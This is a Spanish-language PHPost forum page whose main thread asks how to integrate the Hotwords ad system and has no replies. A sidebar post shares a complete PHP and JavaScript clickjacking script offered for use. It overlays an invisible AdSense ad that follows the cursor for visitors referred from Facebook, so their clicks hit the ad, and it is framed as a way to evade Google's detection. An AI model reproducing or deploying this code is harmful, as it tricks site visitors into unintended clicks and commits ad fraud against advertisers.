Jump to content
  • 0
Conéctate para seguir esto  
Videmax

Como integrar Hotwords a Risus 1.2

Pregunta

Hola alguien ya integro el sistema de publicidad Hotwords con phpost? Por favor quisiera que me compartan esa informacion o tutorial gracias

Compartir este post

Enlace al post
Compartir en otros sitios

0 respuestas a esta pregunta

Recommended Posts

Aún no hay respuestas a esta pregunta

Registra una cuenta o conéctate para comentar

Debes ser un miembro de la comunidad para dejar un comentario

Conéctate para seguir esto  

• Similar Content

• Por Videmax
      Hola alguien ya integro el sistema de publicidad Hotwords con phpost? Por favor quisiera que me compartan esa informacion o tutorial gracias
    • Por unfernacho
      Hola amigos quería saber si ya existía en phpost esto o alguien puede implementarlo, cuando un usuario entra y tiene ADBLOCK activado en el lugar de la publicidad mostrar un texto que pida desactivarlo, se que existe un mod para blockear si usas adblock pero este mod prohíbe la entrada a la web hasta obligar al usuario a desactivarlo, y a mi no me estaría interesando eso, solo quiero poner un texto en lugar de la publicidad cuando esta se bloquee por el adblock, dejo fotos de ejemplo desde ya espero sus respuestas y gracias por pasar!

• Por RodrigoVGarcia
      Hola amigos, sigo con mi web de dibujantes. Y quería preguntarles si hay alguna manera de ponerle publicidades a un post específico. No a todos los post en general. Sino solo al post que yo elija y le ponga el código a mano. Quiero publicidades a los costados arriba, abajo, en el medio (seria dentro del post) etcétera. ¿Como puedo hacer?
      Pagina: www.dibujandoconestilo.esy.es
      Los post a los que le quiero meter la publicidad adsense (si son mas de 3, pero adsense saco una nueva normativa en la que ya se puede mandarle las que queramos siempre y cuando sea equivalente a la cantidad de contenido de la web), son los que aparecen en "Temas importantes en dibujando con estilo".
      Creo que esos post son styckis o como se escriba, y por lo tanto puedo ir al archivo mm, capaz que lo resuelvo yo mismo. A ver si me sale.
    • Por IndeX
      Buenas, un cordial saludo, porfavor alguien de buen corazon que pueda actualizar el mod, ya que lo instale y no funciona haber si alguien me puede colaborar se lo agradezco mucho el link del mod es http://www.vellenger.com/posts/complementos/36/Popup-de-publicidad-V3.html

mi pagina es http://unionbinera.net/

Gracias porfavor espero no me ignoren 
    • Por RodrigoVGarcia
      Hola amigos de phpost, eh visto este tipo de cosas por Internet pero que generalmente cuestan de 30 dolares para arriba. Los creadores realmente quieren sacarle el jugo. Y entre en un foro donde uno ponia el codigo gratis. Así que se los dejo, no se si andará bien, ya que iba a probarlo pero estoy tratando de hacer que la publicidad adsense se vea en mi web en primer lugar. Pero no hay caso, ni con la administración, ni con el adsense aprobado, ni nada.
       El codigo supuestamente hace que tu publicidad adsense de tu web, se vuelva invisible y ademas que siga tu mouse, para que cuando hagas click te lleve a esa publicidad. Ademas de eso solo sirve si los envías a la web objetivo desde una web que especificas en el código. De esa manera google no detecta el codigo, o por lo menos eso supone.
      Así que se los dejo, ustedes que saben diseño web mucho mas que yo, entenderán el código y sabrán su funcionamiento. Ojala les sirva pero cuidado, que estas cosas si te descubren te banean la cuenta. Saludos!

<?php $referer = $_SERVER['HTTP_REFERER']; $referer=str_replace("http://", "", $referer); $referer=str_replace("https://", "", $referer); $referer=str_replace("www.", "", $referer); $pieces2 = explode("/", $referer); $referer=$pieces2[0]; if($referer == 'facebook.com') { $ref="si"; } else { $refer="no"; } if(($ref=="si")) { $ctr =100; if (rand (0,100) <= $ctr) { $control="si"; } else { $control="no"; } } if(($ref=="si") && ($control=="si") ) { echo "<style type=\"text/css\"> #clickjack { background-color: rgb(0,0,255); opacity: 0; height: auto; width: auto; position: absolute; top: 50; left: 50; border-bottom: 1px #76e042 solid; border-bottom: 0px blue solid; color: #ffffff; padding: 0px; z-index: 1001; font-size: 13px; } </style>"; echo "<div id=\"clickjack\">"; echo "<a href=\"#\" onclick=\"getValue()\">\n"; echo "</a>\n"; echo "<div class='cfmonitor'>\n"; echo "<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\n"; echo "<!-- nombre -->\n"; echo "<ins class=\"adsbygoogle\"\n"; echo "style=\"display:inline-block;width:336px;height:280px\"\n"; echo "data-ad-client=\"ca-pub-xxxxxxxxxxxxx\"\n"; echo "data-ad-slot=\"xxxxxxxxx\"></ins>\n"; echo "<script>\n"; echo "(adsbygoogle = window.adsbygoogle || []).push({});\n"; echo "</script>\n"; echo "</div>"; echo "<script type=\"text/javascript\">\n"; echo "var div = document.getElementById('clickjack');\n"; echo "document.addEventListener('mousemove',function(e) { \n"; echo "div.style.left = e.pageX -280 +\"px\";\n"; echo "div.style.top = e.pageY -360 +\"px\";\n"; echo "});\n"; echo "</script>\n"; echo "</div>"; } ?>  
  • Navegando Recientemente   0 miembros

No registered users viewing this page.